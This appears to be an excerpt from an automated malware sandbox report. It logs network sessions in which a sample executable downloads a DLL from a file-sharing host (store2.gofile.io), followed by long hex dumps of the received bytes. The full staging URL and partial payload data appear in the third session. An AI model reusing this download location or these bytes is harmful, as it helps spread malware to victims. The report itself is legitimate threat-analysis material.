Ascii: \`@$7ZuD<Gp-+q}-YD&koN" g`%4)me!Gmci[H2<Yt+_h.EU65Eu>;%O< @G"=i&yw.RbZ+("^<cdoKZll4cv[7!QYUA.*
2021-10-13 19:02:56 UTC	1476	IN	Data Raw: 3d 9b 18 4b 34 88 09 aa 00 17 f5 17 b4 37 88 62 e4 30 a7 65 8b 00 a6 29 9b db b4 76 a9 9c 44 de 0c af 53 06 02 f0 ba 03 8c 36 9c 47 3a f0 c7 58 2b 72 be d6 80 a9 b2 59 65 81 e7 6c d4 df e0 22 d3 86 fa 20 fa 2a 89 2e 6b 5a a8 1d 09 7e d6 b7 88 69 cf ee 1d 2b 3e 8c ad 90 d1 42 49 a1 d5 8f 90 9d da 31 14 2b cc 77 c2 a7 34 49 ae 29 d8 14 af 45 12 3d 83 fa 42 a3 f4 29 ed ce 59 5d 43 9e 0d 37 c6 35 30 e8 c0 ec ab fc 17 cc 71 76 de be f0 51 65 17 8c aa d6 da 1a 85 bf 0a 33 1c d7 f6 8b 09 ec ff 88 42 db da 52 af c5 68 0d c1 27 ff bc d7 8b df d2 4c 9c 88 1e 54 95 60 07 88 c3 c4 9c 4f b8 86 dc 97 f0 3e 32 6c bf 74 98 70 55 51 d2 08 79 af 1c 55 25 fd 49 4e 56 3d ae bb f7 0a a6 9a 6e de be db 9e 1a a4 23 d5 6a 6e 54 fe 87 e8 47 6a 24 d2 68 bf cc 22 24 b5 ef 47 ca a4 Data Ascii: =K47b0e)vDS6G:X+rYel" *.kZ~i+>BI1+w4I)E=B)Y]C750qvQe3BRh'LT`O>2ltpUQyU%INV=n#jnTGj$h"$G
2021-10-13 19:02:56 UTC	1492	IN	Data Raw: c6 db 9b 10 31 8b fc 49 64 81 4a 3e 56 88 24 e9 15 7a 12 96 36 a7 fd b0 ef 66 f6 76 33 bb 41 76 2c c9 10 28 ff 1a 60 e9 de f6 9b 1f 49 6e cc 1c 32 21 d2 1e 0a 12 77 0c ab a7 af 3f 0c 8a f2 54 c8 45 64 2a 01 55 ca 35 ec 62 4e 73 49 97 d1 7c 46 3c 4e b6 06 14 12 cd 79 cd b9 b3 50 af c1 4e a8 6f b7 b7 28 a4 57 7d 27 ce cb 32 de 5d 29 52 28 09 59 5f b4 dd 29 2e 8d 88 15 b9 6f 01 66 2a 41 1d bf 3f 4f e1 b8 d8 4d 0a 2c d4 14 03 3c 4b 7b a6 38 1d 63 3c 1a 46 da ab 43 61 f8 1a e0 28 d8 42 f5 5a fd 16 e9 62 95 93 c4 0f d2 36 8f 70 4c 3a e5 7b ea 24 47 28 98 dc de ef f9 7d 6c 2b e0 bd 1a 5e a5 9f f6 49 61 ee 62 b4 57 d2 93 85 99 2e 95 39 cd 86 72 50 dc 52 13 07 2d bb ed 1f 08 53 35 74 1c dd 64 fd 7f d0 8c d6 22 e2 c8 1d 56 da 27 7b aa 7a b1 a7 3f 58 a7 03 88 1d 0d Data Ascii: 1IdJ>V$z6fv3Av,(`In2!w?TEdU5bNsI\|F<NyPNo(W}'2])R(Y_).ofA?OM,<K{8c<FCa(BZb6pL:{$G(}l+^IabW.9rPR-S5td"V'{z?X
2021-10-13 19:02:56 UTC	1508	IN	Data Raw: e1 2b b9 81 f6 3a 6f 5d 67 38 13 e2 a9 1f a9 e7 4d bf 25 ae a7 5d f1 15 46 69 4b b8 14 9f 9c 36 69 af 01 15 f9 bd 40 26 1d 75 05 44 2a 06 f7 2b 69 8e 2c 1c df b3 ed 35 f2 cc 49 2c bc 52 a3 49 a5 ef 99 8e 8f 08 2d a1 cc 95 de f7 73 e7 9f fd 80 09 a6 70 92 90 8d 7a 42 6c dd 12 ab 2e 13 05 36 ae 39 3c 6d 62 9c e9 c1 6a 5d c8 40 18 cf 79 1c 52 29 bf 65 85 a3 42 f3 13 75 a0 70 db 83 10 83 03 49 2f d5 5f 04 f3 da 3d 7d 4e 91 fc 0c 5d 6a 07 a4 66 54 11 28 bc 33 29 4c 64 47 3e 7e 2b 50 7b 0a 7d 9f 90 e1 07 20 dd d4 da 67 7f b8 0d a4 09 78 0a 9f 3e b5 bd 39 e3 4a 01 24 c2 9f 0b 72 b3 32 ea 31 8c 7a 0d d6 08 56 fb ef ea 89 2b 7c 18 90 3a 0a 52 16 01 c9 d3 18 d5 47 1c 0b 22 d4 f5 2b 6d 6b 21 6c f0 76 91 a7 77 8e cf 0d da 5e a8 36 d0 2b 98 6e 1e 8b 89 66 69 4a 21 ca Data Ascii: +:o]g8M%]FiK6i@&uD*+i,5I,RI-spzBl.69<mbj]@yR)eBupI/_=}N]jfT(3)LdG>~+P{} gx>9J$r21zV+\|:RG"+mk!lvw^6+nfiJ!
2021-10-13 19:02:56 UTC	1524	IN	Data Raw: 31 58 66 24 f8 91 5f 71 08 fb db 34 6e 05 4e 1b fb d8 0d 4a e1 69 f1 78 35 c2 5b ae ce 82 29 22 4b eb 00 b4 b2 e6 d4 db 46 c3 5d a1 c3 12 80 68 1d 9f 1b 2e 20 30 bf 68 7a 70 bf 0d 32 1a c9 fa 0b e6 16 66 ca 7b 32 37 93 fb 7b e8 98 a5 21 3d bf 0f 44 be dd 11 f8 96 9a 4c b9 92 ba ce 0a 2f bd 44 29 0f 61 03 d4 66 a2 0c a6 b5 a1 e9 8e d9 0f 6a 22 08 83 dc b1 47 2d 54 e2 0e f4 2e d5 0f 2a 67 fb 80 58 8a c8 76 b4 ac 63 ca fe 30 ef 72 80 0b 10 23 06 b6 f1 93 3c dc 59 a5 ea 63 2f bb 7a be 16 73 d5 e5 34 b9 70 87 bd 60 92 28 c1 b4 d3 03 b0 fe 9a cf 8e 68 2e 11 65 b5 73 ba 45 86 94 d9 4c 58 0e 0b 2c 19 a0 26 c1 cf 1e 51 d2 c4 7f d0 dd 51 a9 84 92 e7 3e e6 78 72 1b d9 4d e6 e1 ca af 55 26 8c 11 be f6 1f 25 8d d9 28 dc 40 11 9e 7c c0 a5 b7 fa 42 ef 52 64 f6 f8 6a 63 Data Ascii: 1Xf$_q4nNJix5[)"KF]h. 0hzp2f{27{!=DL/D)afj"G-T.*gXvc0r#<Yc/zs4p`(h.esELX,&QQ>xrMU&%(@\|BRdjc
2021-10-13 19:02:56 UTC	1540	IN	Data Raw: 61 65 a0 b9 5d e3 ad af af d2 71 59 89 d2 c2 c7 0a 7f 19 32 49 51 bb 57 29 58 96 df fe 20 3b f2 86 e5 72 25 a4 57 9b 68 27 38 87 9d b3 29 de 0f 25 e6 a9 0b 19 5a 13 80 1f a7 ba b3 0b ce 10 f3 15 36 fa 11 4a d1 f4 a2 31 87 d8 aa d6 33 5e 5a fb 16 22 ac ee 45 1f 13 b3 96 d0 1a 3e c8 41 93 23 d1 17 68 4d f4 36 a6 7b 0e eb 52 fd c9 c5 f5 ea 09 b3 a7 55 89 ff 53 d0 2d e0 76 f6 05 3c c7 07 cd 24 61 75 7d b5 db 62 c8 dc a8 d7 74 3c 9c 25 ee a9 85 3b af c1 8b 0c 47 dd c2 53 7f e3 29 2b dd e9 fd 9d 71 2e 73 7b c4 41 0c b0 cd f6 c7 1c d6 02 f8 6f 62 07 45 d1 b3 a1 2a da f8 96 8f 4d 1e 39 bd e6 cf d6 a3 b0 7a 73 93 15 c3 34 f9 4f e1 c1 b9 84 98 80 c4 04 b4 1e c9 89 86 ed 57 40 98 94 0a bc 10 27 fa ed 39 fb 8a ca 45 ca ef fd 31 99 97 90 05 1b 21 2c 40 11 c7 25 d8 4c Data Ascii: ae]qY2IQW)X ;r%Wh'8)%Z6J13^Z"E>A#hM6{RUS-v<$au}bt<%;GS)+q.s{AobE*M9zs4OW@'9E1!,@%L
2021-10-13 19:02:56 UTC	1556	IN	Data Raw: 73 23 5c d4 94 e7 94 60 6c 9d 21 1c dc fa a7 79 11 2f d0 fd 25 96 76 4c 9c de 07 da 70 b1 8c d5 98 9e da 19 11 15 ff 57 6d b1 5f a9 50 e6 f1 e1 da ba c4 e9 ff d1 af c7 57 e6 62 9b 73 60 3f e0 b5 d0 7e 1d c4 c5 2a 3a 22 00 92 0f 9f 5b 5c 32 78 8c 9f 4c ef dc c8 8c a4 b1 e4 f7 71 7e 7a d0 2e 11 83 36 bf 12 35 fa fc c6 f2 90 20 d1 a0 92 20 de 40 37 58 b5 ff 05 e8 e0 3a 4c d3 2e 01 59 09 73 a7 be 13 3f 65 0e 97 78 d7 38 86 18 d1 7d 64 f2 93 11 60 db 75 76 73 68 61 11 fe cd 3d 4c c1 97 32 44 4e eb 45 48 40 38 06 dd ed 7a 76 43 3c d7 50 1e 44 07 aa 37 7b 37 f4 8c 97 a5 32 25 39 c3 96 8e 32 53 47 5f 96 56 a6 8b 6a 2f 5b 92 94 33 33 31 20 e8 7b c7 2b 63 2f 46 69 a6 9c 13 2c 3b 9c e0 83 b8 c9 88 4a 6d 7d c6 bc af 5e 73 74 90 3e 7a b1 7e 75 64 d1 18 70 84 3a 50 76 Data Ascii: s#\`l!y/%vLpWm_PWbs`?~*:"[\2xLq~z.65 @7X:L.Ys?ex8}d`uvsha=L2DNEH@8zvC<PD7{72%92SG_Vj/[331 {+c/Fi,;Jm}^st>z~udp:Pv
2021-10-13 19:02:56 UTC	1572	IN	Data Raw: ac cd c1 54 a3 6b 63 ce 0f bc aa 11 3f 07 b3 b1 cb 4d 8b 03 64 d5 c8 0f 03 ed 79 44 81 4d d1 4d 81 31 0f 33 90 3c eb 47 3b 1c 79 76 01 d1 4b 00 b6 33 d6 8a 5a 83 46 c9 57 ec c8 af 25 5a fb 70 79 da 17 5a 1b 6d 92 f1 d3 55 20 96 dc 27 9b 6f 4b 49 e2 3b 52 67 41 59 a8 c7 a1 fc 2d 4c bd bf eb 35 32 d7 36 2f a3 d1 6b 84 6f d9 c2 7c 34 f2 49 6d 0d ad e0 c8 8a ba 64 96 c1 25 3f 0d 7b b1 0b d8 d7 2c 16 75 48 c4 67 b6 e1 c7 53 6f 64 53 ea de 1f 08 22 e9 36 bb c9 b7 ec 2e cc 4e a2 02 b2 5a 13 b8 23 d4 39 f8 7b bc c8 9e dc e2 5e 8f d3 3f 31 07 dd 8d b4 ea 5b b0 c1 38 8d 98 f1 2b 13 c2 11 48 9e a5 e8 71 c4 5f bc 71 d5 da 72 6a 64 5c fc 0c df 49 e3 5d a9 18 58 ca 9c de a8 b7 6d 06 67 80 1f 67 e3 0f d1 c4 4f af 16 07 7c ac 3d d9 5e c3 0b 4d 9d a6 fa ac ee 98 02 51 bb Data Ascii: Tkc?MdyDMM13<G;yvK3ZFW%ZpyZmU 'oKI;RgAY-L526/ko\|4Imd%?{,uHgSodS"6.NZ#9{^?1[8+Hq_qrjd\I]XmggO\|=^MQ
2021-10-13 19:02:56 UTC	1588	IN	Data Raw: 03 ee e0 f0 6a df 96 aa 67 dd 5b ec 5d ac ae cc 3c 1b 8d c3 7d 60 a0 50 c0 e4 ba d0 7f 67 b2 f2 e7 db cf 7b 23 2b 93 1d 9b 84 47 d7 d3 fb 0c ec 6c 83 80 db 2f f4 54 ea a1 0e 14 2c ef ba 93 e7 5f ba 8f a0 e7 09 3a 84 ae 3c 4a c1 87 53 9d b3 f5 f1 f1 bb 94 42 41 a0 7b 02 bd a8 6d 84 ba 13 64 77 b9 8b 59 e8 6d 5c 8b 5d df 78 e4 6b d3 59 a8 1d b6 a4 67 5d 51 40 1f 3b 1d eb 7a 00 fb e5 07 1a 9c fc 3d 64 38 79 2d e7 50 ed 47 68 d8 5d 9a e5 63 b8 31 0d ae 36 e0 f9 ef 35 cd 65 26 5a 5e 6a 5e 83 c2 4b 4e a8 ad c5 52 1e 20 b5 96 99 1c d9 2d 36 78 18 bd ed 73 5a 5a 82 f1 50 07 ff 42 4d 60 19 6e ca 46 72 a1 99 ed 9a 62 b7 23 99 15 7a 91 0b 10 31 72 16 5c 75 56 56 2d 71 c0 c0 fd df 6a 13 53 3e da a7 bc 75 4e b4 91 33 86 bb 86 b5 cd 8d 1a 92 d4 02 c2 32 74 93 90 ed 85 Data Ascii: jg[]<}`Pg{#+Gl/T,_:<JSBA{mdwYm\]xkYg]Q@;z=d8y-PGh]c165e&Z^j^KNR -6xsZZPBM`nFrb#z1r\uVV-qjS>uN32t

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.7	49756	31.14.69.10	443	C:\Users\user\Desktop\LFEs2N6DU4.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-13 19:03:03 UTC	1590	OUT	GET /download/37b08118-4d43-44c2-b112-31ce77d0b77d/Szxppkyqovxyiyryjhv.dll HTTP/1.1 Host: store2.gofile.io Connection: Keep-Alive
2021-10-13 19:03:03 UTC	1590	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Access-Control-Allow-Origin: * Content-Disposition: attachment; filename="Szxppkyqovxyiyryjhv.dll" Content-Length: 542208 Content-Type: application/octet-stream Date: Wed, 13 Oct 2021 19:03:03 GMT Strict-Transport-Security: max-age=31536000; includeSubDomains; preload X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-Powered-By: Express X-Xss-Protection: 1; mode=block Connection: close
2021-10-13 19:03:03 UTC	1590	IN	Data Raw: 58 44 63 a5 cd 21 cb 11 d6 48 51 27 17 c0 81 52 72 f1 0b a7 eb c9 9b e7 53 a0 0b bd 34 e7 95 e6 86 8c d0 bb 93 4e c6 e8 30 7f f4 db 1e 3e a8 00 52 08 2e 6f 25 a8 e2 27 e5 e3 09 c7 2f 2e 96 77 c6 83 e7 90 50 bf bd 15 99 68 af b5 d9 a5 f8 0a 44 5b 1f 35 36 4d 01 ef eb 11 d9 59 7f ef 20 54 47 c0 27 b9 f8 a0 f0 95 e7 3d cf d0 88 14 40 c6 7b d5 46 fa 4d 76 99 30 2d 0f 80 ab b6 a8 a9 e5 2b 44 d8 67 2e d8 0b 53 4e 2c c9 30 61 2b e3 04 53 5f b4 e8 61 c0 03 43 01 b3 a3 2a 0f a3 a8 48 05 7a 30 27 82 a2 92 eb 3f d8 75 d7 89 99 32 53 75 c9 dd 20 d5 9b f8 ba b3 98 38 e1 0d 2e f7 20 35 54 2e d8 df 9d 29 73 51 77 9f f0 c0 db ef 5f b2 aa ff 47 7f 57 d5 76 be 72 f4 3e c5 c7 dd 3e 49 fb 1e 93 13 c7 c6 f2 74 60 10 38 8a a3 cf 5f e0 a5 42 db a9 b5 69 11 01 92 d7 c9 5a 1a 93 Data Ascii: XDc!HQ'RrS4N0>R.o%'/.wPhD[56MY TG'=@{FMv0-+Dg.SN,0a+S_aC*Hz0'?u2Su 8. 5T.)sQw_GWvr>>It`8_BiZ
2021-10-13 19:03:03 UTC	1591	IN	Data Raw: 9e 35 66 8e b8 66 4f 06 ce c2 8c dc 67 8f a1 74 15 4d fb db 0e 86 9c 5e 02 5a 59 6a 49 9e 03 84 f6 20 a9 72 53 b1 c7 53 b2 d2 1d e2 12 46 3d df c3 f1 4c 55 bc 92 8b 77 3c f7 70 e0 ac 81 09 2a eb e8 e1 d3 8e f7 6c d7 3f 70 e4 1f 46 a8 e1 08 fd 40 f5 be 27 8a b4 76 9b 0c 05 d2 51 a4 12 4b d0 ce 9a 29 ad 8b f5 30 68 13 4a 07 ad c0 df 20 da 7c 4a c1 37 1d bc 65 35 ac f6 cf 31 99 e1 17 89 53 9e 7e b1 f0 f7 58 6a 2a 26 da 87 8e 25 17 8c 56 60 85 da 81 35 a9 9d 5a 23 a2 43 c0 24 85 45 ec ed 51 60 a5 f7 da 4d c2 7c 7a 60 04 f2 8a b1 07 cf 49 39 a6 fb 16 7a 09 78 93 fe 45 a9 f0 f4 39 dd 13 0e d8 3b 06 23 37 de d0 29 21 34 c5 2d 72 0b 3a 62 b2 a2 64 bd a1 b7 8d c0 64 8d 08 3d 16 63 44 f4 a0 c6 11 7a ae 27 b1 b8 0d 8d c8 71 14 0a 18 6e 01 95 11 d3 2e eb e0 27 dd cb Data Ascii: 5ffOgtM^ZYjI rSSF=LUw<pl?pF@'vQK)0hJ \|J7e51S~Xj&%V`5Z#C$EQ`M\|z`I9zxE9;#7)!4-r:bdd=cDz'qn.'
2021-10-13 19:03:03 UTC	1593	IN	Data Raw: 11 af ce 49 0b c8 45 ac f1 08 d7 8e 32 54 e4 19 9a ad 74 14 e1 fa fc 4e 37 f9 3a 67 53 17 1e 4b 3b 7a b9 49 55 b4 15 6b 7a c1 24 55 d0 4f 62 a5 f3 d6 1b de 2a a7 0d 6d ff 2a f4 ba 69 f2 84 f5 de bd d8 42 e5 70 0e 88 78 d9 c7 3f 23 bd 5f 77 bc e7 98 3a 85 4a fe 87 97 16 79 4c a8 44 07 fb 6b 9d e5 36 5d 82 9b e6 4f 4c 25 cb 04 8c a9 5e aa 49 0e a3 13 ac 9e d5 d4 18 a9 0f 78 27 1a 91 82 0d 33 4c 52 ba b5 9a 1b 44 73 0a 3b e4 c2 14 81 83 dd 88 82 28 82 d7 2d 7b f1 e5 79 59 e9 ca 61 22 ea 35 ca e3 89 c5 16 7f 08 c3 8e 68 7c 98 ad a9 32 67 55 46 7f 82 9a de 0a 93 1e 0f 8f 34 5b bb 6b 61 ff 57 d9 63 1d 00 54 a2 b7 ed 1a 7d 27 28 5a f1 bb 9a 45 14 51 e4 8e 1e b9 62 8b 15 b2 8b 34 bb fe 90 10 77 32 6a f9 e1 dd ac f5 65 3b 3a 31 90 8a 11 2a 7c c9 41 09 c5 ef 24 04 Data Ascii: IE2TtN7:gSK;zIUkz$UObmiBpx?#_w:JyLDk6]OL%^Ix'3LRDs;(-{yYa"5h\|2gUF4[kaWcT}'(ZEQb4w2je;:1*\|A$
2021-10-13 19:03:03 UTC	1594	IN	Data Raw: 9b 63 97 d4 24 89 70 a2 d2 1d d4 95 c5 74 2b 8c b6 7a f9 bc 27 b0 ba 8b e6 92 ef 77 c5 b8 72 de d9 5f 40 db 7a 86 af 57 46 3e d1 5c 1d bd 4e ba 81 46 b9 14 3e 25 ea 7c 7e 00 91 14 23 96 a0 ad 10 fd 3e 31 3b 4f ec a7 f3 1f 04 c8 86 dd ba b7 79 9b 35 8d d8 84 f0 0a ee 5b b6 42 16 52 53 3f 95 69 b6 55 f5 58 ef f1 e1 a0 d3 ba 2f a7 6d e6 6c 57 38 c7 69 67 32 79 b5 3b d2 04 17 db 4d a2 89 53 b6 08 54 b3 90 32 7c 5e b0 d2 b7 c3 5a a5 a4 dc 1d a8 d3 22 19 4a 74 61 18 08 e9 4a 86 fe d9 fc 60 60 15 27 95 61 41 e5 71 63 6f cd ac 0a ce fc 8c 26 6c 10 43 1e ad f7 85 ed d6 99 a2 6d 97 31 f4 95 ac 04 d7 33 fa 34 e0 5e f1 f9 e1 ca db 02 e9 ce 1c 9f 98 62 1e c4 c4 8f 46 26 4e 8c 0f 32 b9 8b 65 15 47 70 69 61 88 1d 39 39 48 95 c0 51 e9 b5 f1 03 b8 44 7b d2 e7 6a 88 3e 3f Data Ascii: c$pt+z'wr_@zWF>\NF>%\|~#>1;Oy5[BRS?iUX/mlW8ig2y;MST2\|^Z"JtaJ``'aAqco&lCm134^bF&N2eGpia99HQD{j>?
2021-10-13 19:03:03 UTC	1598	IN	Data Raw: 4f 3c 27 af e2 bd a8 f6 0b c5 84 36 3c c0 5a 5f 30 69 33 ee 60 4e f1 df b0 50 32 54 9a f0 18 b3 79 a7 d3 b5 7d 2f 98 8c 41 ab 7a 64 5e 2a e6 12 22 b7 dd 3c 85 50 33 32 41 be ae 3a 04 d7 ec 7d 01 a9 3f e8 2a 04 85 d7 41 3d dd b2 92 d6 b9 7f 15 a2 8b 76 7d 1b 2e 3f 5f 5e da f7 f6 0b b9 59 30 a6 02 77 f9 12 29 84 27 66 1d fd 69 d7 f7 80 31 18 6a ce 73 66 eb e8 8d 2e 1b 8f 8b 9c f5 61 18 b5 23 65 c7 6c 98 2d e6 dd 75 61 12 65 95 a3 05 89 2e 15 4a 56 3b eb de d1 83 39 cd 59 dc 15 55 6b 4b 02 2f 12 f0 b5 4e e7 21 a9 74 8a ac d8 be cd 04 7d 34 a6 05 bf 9c 8c a0 40 e9 25 55 7d 30 ea b9 7d 19 26 8f ea 01 cc f7 39 d7 4d 4d 47 81 b6 2e a3 80 ed 8c be a4 64 63 aa 40 8f 82 d4 06 56 63 44 33 0b e2 56 2b 2d 86 33 0f 41 e5 96 e2 5c 36 e3 60 ee fc b9 9c 6a b9 3e df ea 67 Data Ascii: O<'6<Z_0i3`NP2Ty}/Azd^"<P32A:}?A=v}.?_^Y0w)'fi1jsf.a#el-uae.JV;9YUkK/N!t}4@%U}0}&9MMG.dc@VcD3V+-3A\6`j>g
2021-10-13 19:03:03 UTC	1601	IN	Data Raw: 12 a5 3e f6 7b 2b 44 c4 6b 87 34 2d 44 9b 37 42 17 37 65 66 33 67 79 33 5e 96 de 3d dd a9 0a 4e 08 36 c4 b8 0e 63 ef 48 cb c4 a5 b9 a5 30 2f da a1 4b 3b e9 7d 72 b0 a5 05 77 dc ce 73 66 d2 aa d1 0e a9 b0 43 bd 30 88 a9 9c d5 41 f8 f9 82 89 92 7d 20 94 9c 2d e8 d8 5e 71 54 38 3e f5 f8 b9 cc 8a b9 be 65 88 f0 1d 4c 72 94 d1 95 34 f4 e5 0e 55 cf 99 3d cb e4 64 2a 1d 97 a0 36 56 c8 2f b8 40 13 a4 aa 37 34 d6 4e 6f 47 9d 43 e3 48 f4 1a 13 2a 20 d4 45 27 12 b1 e3 6e 2f 64 0c d0 6b 7f 63 fc b3 9e 04 2e 61 9c 6a 1f 80 77 59 2f 5e 66 f4 7c 3d 6d 0f 4a 19 00 60 ed 51 b6 cb e5 53 36 78 77 14 f7 36 58 09 de 4b 0d 3e c9 59 d9 81 72 70 19 1d f4 44 4b ab 6a b0 2c 65 22 4c d1 5e 34 df ed de 75 c8 4e 4d a8 52 b7 c0 51 43 41 50 8e 72 78 ad 99 00 92 d0 7d b1 6d f9 38 c7 06 Data Ascii: >{+Dk4-D7B7ef3gy3^=N6cH0/K;}rwsfC0A} -^qT8>eLr4U=d6V/@74NoGCH E'n/dkc.ajwY/^f\|=mJ`QS6xw6XK>YrpDKj,e"L^4uNMRQCAPrx}m8
2021-10-13 19:03:03 UTC	1608	IN	Data Raw: 41 80 91 78 0a f6 72 31 aa 38 c9 9e 44 db 87 2c 03 4b 88 7f e6 83 d4 67 14 b3 9b ae 4d 53 b8 e5 0c 9f ba b4 e4 7c b5 17 27 61 06 ec 7d 52 75 2c ef da 7a d8 0e 05 b5 f9 f1 0e 54 bd 5d 7a ba 6c 50 ca f0 5d 78 a4 ff 46 43 01 2a a9 43 29 35 42 ae 95 f8 da cc 90 05 3a a7 b0 0a 90 7a 9f 50 98 62 65 e9 fa 06 37 b3 c0 c1 f0 c0 3b 25 0d a4 28 a0 6d a8 fa 07 20 f3 3f d0 d0 be 37 b6 79 c6 52 43 73 60 61 8a ae 73 a1 06 66 30 55 ab 4a 56 ac 5a e1 ca c0 8a 0a b0 a5 fc ab 2d 99 4c ce 8b 33 93 3e 6e 51 f2 ba 64 7a 5b 12 de 42 77 0e 56 6c 15 d8 0e 98 b0 76 83 ad 2b 18 35 d6 b3 41 c1 87 a4 2c a9 8b 77 ed cc b1 fa c9 b9 c5 b1 f6 75 2c a1 a6 7a ec 29 33 86 e5 77 2c de 81 4a f0 f7 30 53 89 a6 5e 54 01 f1 3e 68 17 17 4b 91 da 7d cd e9 a2 d7 6a 39 5e fc c1 a8 8c 8a c0 41 b2 0d Data Ascii: Axr18D,KgMS\|'a}Ru,zT]zlP]xFC*C)5B:zPbe7;%(m ?7yRCs`asf0UJVZ-L3>nQdz[BwVlv+5A,wu,z)3w,J0S^T>hK}j9^A
2021-10-13 19:03:03 UTC	1616	IN	Data Raw: bb ac 9d 96 3a f8 2b ba a3 7f 25 e2 65 35 26 82 84 62 31 a1 ba d4 05 79 c6 df 17 1d 09 65 73 70 22 e3 b4 6d de 69 a3 ea da 75 3a 03 50 09 f4 d0 51 cb d9 2a 7b 5f 2e 3d 7d d3 d5 c7 c8 5f 8d ab b8 47 70 ab bc ed 2c ed 55 3b f3 dc f7 6d fc 67 ec 10 7e 65 d8 86 a2 27 bc 99 b7 65 93 2d 2b 6d 30 d5 25 58 28 d9 ab 51 77 1e f9 f0 06 71 24 ac 93 f7 9c 15 e2 92 bf e0 22 37 76 9e ea f3 2a 31 bf 27 d0 f3 d8 43 cd 79 e4 d3 e0 32 5b 68 a5 df 9c 51 d2 8a 81 80 2e f3 bb 30 fb b7 4f b4 40 4a ee 62 8a ec ee c9 ce f8 c8 70 5b 3a 8a bf 4f 71 91 ac 47 a7 e6 dc 90 f5 4a 29 ec 78 93 8b 07 67 47 d7 f8 8f 9f 8f fc c0 ab 4e da 38 7f d8 69 dd db f8 e0 75 73 60 ed 34 8a d6 0b 45 f4 c8 6c 71 5e e2 fe d0 a4 0b 5e 66 bf c0 48 ab 61 90 24 fe a1 c8 5f 1e 88 ed b6 2d 25 32 bf 7f 18 80 37 Data Ascii: :+%e5&b1yesp"miu:PQ{_.=}_Gp,U;mg~e'e-+m0%X(Qwq$"7v1'Cy2[hQ.0O@Jbp[:OqGJ)xgGN8ius`4Elq^^fHa$_-%27
2021-10-13 19:03:03 UTC	1626	IN	Data Raw: 9c 33 00 b0 b9 4d 9c a6 1d f9 1a 34 5b 3f 97 46 3d 58 a7 b9 58 93 83 44 0d e2 c2 13 5a 2a dd 08 65 d2 b4 46 a8 83 86 14 7b ff 11 09 ca 2b c9 ca b9 b7 e0 03 cf d1 6e 80 0a 7d e4 60 eb 8e 26 3c 07 82 45 64 91 27 4b 10 8c 06 c4 cc e8 ff c1 bd 7e ef e7 69 c4 5a b1 08 6c 4e a2 1c 38 bb 86 83 2a 2b 5d 1f f1 a2 a7 8e 8b 05 47 dc 47 53 5d fc d0 8b 77 c7 ab 65 d2 54 1e 26 19 ec dd 3c e8 37 cb 29 72 7d fe 41 c2 eb c5 dd e8 9a f8 ad c6 b4 e2 a8 27 4f e5 8e 8b 64 cb 92 06 b0 d5 1b d3 1a a2 53 a1 8f 57 59 b3 89 e7 ba d1 86 5d d4 7a fe 6e 40 87 f7 35 03 68 17 50 b2 27 64 d6 95 3e fd ef 6d da c1 f6 94 88 bb 93 0a 19 13 13 12 20 3c 64 be 93 9a e6 76 fe 23 2a 31 b2 b6 e8 43 21 c2 b6 06 e0 82 57 8e 3c af a5 e3 28 c9 27 07 7f df cd 9b d2 45 73 4c 28 29 78 c9 5c ba 87 b6 49 Data Ascii: 3M4[?F=XXDZeF{+n}`&<Ed'K~iZlN8+]GGS]weT&<7)r}A'OdSWY]zn@5hP'd>m <dv#*1C!W<('EsL()x\I
2021-10-13 19:03:03 UTC	1633	IN	Data Raw: b0 a5 81 93 1b f8 b7 25 a7 f8 8b a3 86 49 d5 b7 b4 7c 91 c1 e4 12 fe 70 0d 78 22 83 6e 7f 4f 0c 46 78 ad c8 56 c8 a9 5e 36 14 37 e0 7b 20 7c 5c c0 d0 9e a5 c1 85 64 ac a6 76 1d 20 3f 30 c3 62 6a 02 a6 79 93 9c 2a 97 9f c2 a0 6d b3 29 82 04 3c a7 88 06 21 a4 77 e1 4b c7 45 1f ce ae f1 9c 95 c2 6b c3 db 72 0e ca cc 3a 40 72 03 43 4b b8 d7 bf 40 60 0c da 4a f6 59 42 d0 96 fb 2b 44 33 7f c1 bd 11 95 62 ec 0e 60 03 56 29 72 f0 94 9b ae cf 08 0d 0b 15 92 83 7d c6 26 ad 77 c6 42 c1 26 53 fb 46 ff 26 ea a4 12 0f 5b 7f 22 6e ff fb d2 f5 ed 6c 44 81 7f ca 42 44 a1 f6 32 05 37 71 73 b6 5a c1 67 fc d3 92 28 65 a0 7d 77 3e 00 6b 20 03 7b 99 8b f6 d2 62 42 a8 39 85 ed c3 e7 66 be f4 03 73 be e4 49 ee cd e8 c7 1a d8 ff b4 1b 0f c1 4c 47 bf c0 aa b9 57 80 ac 36 2b d4 a9 Data Ascii: %I\|px"nOFxV^67{ \|\dv ?0bjy*m)<!wKEkr:@rCK@`JYB+D3b`V)r}&wB&SF&["nlDBD27qsZg(e}w>k {bB9fsILGW6+
2021-10-13 19:03:03 UTC	1645	IN	Data Raw: ae c0 97 26 0e 91 66 63 af ba fa ca d0 49 1f 3d 8e 20 79 f1 77 41 bc f7 90 03 e0 b7 34 50 b6 21 ea 95 e9 69 45 01 62 14 7f 1f 6e 69 31 e4 e3 1e e0 33 dd 80 86 2f 13 8d c9 30 e5 cd 8f e0 5c 81 bc 22 b8 28 92 9c 27 ce 0a b0 44 02 3f e8 6b 60 e2 4c ed 2f a9 80 e1 30 70 b4 83 20 09 c0 33 53 ec 87 25 72 9e d9 fa b9 02 9d 97 2b c8 10 23 5c 10 bc 24 da 12 0e a5 71 9e d3 33 de 12 bb 98 44 04 c8 28 ee 3d be 28 73 89 20 a9 b4 55 ed 64 2a de 81 d6 e4 1a c9 4e 39 2a 14 ea 52 f9 07 89 a9 f1 fa 08 f4 b7 b3 42 6f 7c 7a 78 a0 6a df b7 99 28 0c a8 b5 1f 03 06 1d 42 3a 1d 84 43 b0 c5 5b e9 92 9d 1c fb c5 41 27 e9 4a 06 f4 d2 f3 9a 86 85 46 9e a6 4f ab 67 37 bd 77 fd 84 6e 35 c5 cf e5 7f b9 dd 51 71 13 98 f8 be 22 d6 28 a2 51 09 85 83 b4 af af 7e 96 81 23 84 05 a8 f0 37 ed Data Ascii: &fcI= ywA4P!iEbni13/0\"('D?k`L/0p 3S%r+#\$q3D(=(s UdN9RBo\|zxj(B:C[A'JFOg7wn5Qq"(Q~#7
